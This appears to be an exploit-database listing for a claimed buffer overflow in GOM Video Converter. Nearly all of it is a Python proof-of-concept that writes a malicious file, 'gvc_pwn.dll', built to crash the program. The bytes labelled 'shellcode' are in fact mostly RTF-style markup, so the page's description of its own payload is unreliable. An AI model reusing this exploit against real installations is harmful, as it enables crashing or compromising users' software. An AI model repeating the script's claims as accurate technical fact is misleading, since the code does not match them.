GOM Video Converter Buffer Overflow



EKU-ID: 2775 CVE: OSVDB-ID:
Author: Ucha Gobejishvili Published: 2012-11-08 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
#=============================================================#
# GOM Video Converter .dll Buffer Overflow Exploit
#
# Downloaded from: http://converter.gomlab.com/eng/download/
#
# 11/06/2012
#
# Ucha Gobejishvili
#
# Tested Platform: Windows 7
#=============================================================#
import os

evilfile = "gvc_pwn.dll"
shellcode = ("\x7b\x5c\x72\x74\x46\x31\x23\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x73\x68\x70\x69\x6e\x73\x74\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x73\x70\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x67\x65\x6e\x65\x72\x61\x74\x6f\x72\x20\x4d\x73\x66\x74\x65\x64\x69\x74\x20\x35\x2e\x34\x31\x2e\x31\x35\x2e\x31\x35\x30\x37\x3b\x7d\x0b\x69\x65\x77\x6b\x69\x6e\x64\x34\x5c\x75\x63\x31\x5c\x70\x61\x72\x64\x7b\x5c\x70\x6e\x74\x65\x78\x74\x0c\x32\x27\x42\x37\x09\x61\x62\x7d\x7b\x5c\x2a\x5c\x70\x6e\x5c\x70\x6e\x6c\x76\x6c\x62\x6c\x74\x5c\x70\x6e\x66\x32\x5c\x70\x6e\x69\x6e\x64\x65\x6e\x74\x30\x7b\x5c\x70\x6e\x74\x78\x74\x62\x27\x42\x37\x7d\x7d\x0c\x69\x2d\x37\x32\x30\x5c\x6c\x69\x37\x32\x30\x5c\x71\x63\x5c\x63\x66\x31\x5c\x75\x6c\x08\x5c\x69\x0c\x30\x0c\x73\x32\x30\x20\x35\x2f\x32\x38\x2f\x32\x30\x31\x31\x5c\x63\x66\x30\x5c\x75\x6c\x6e\x6f\x6e\x65\x08\x30\x5c\x69\x30\x5c\x70\x61\x72\x5c\x63\x66\x31\x5c\x75\x6c\x08\x5c\x69\x0c\x31\x0c\x73\x34\x30\x7b\x5c\x70\x6e\x74\x65\x78\x74\x0c\x32\x27\x42\x37\x09\x61\x62\x7d\x48\x49\x20\x2e\x2e\x2e\x2e\x2e\x2e\x2e\x2e\x5c\x63\x66\x30\x5c\x75\x6c\x6e\x6f\x6e\x65\x08\x30\x5c\x69\x30\x0c\x30\x0c\x73\x32\x30\x5c\x70\x61\x72\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d")
crashy = open(evilfile,"w")
crashy.write(shellcode)
crashy.close()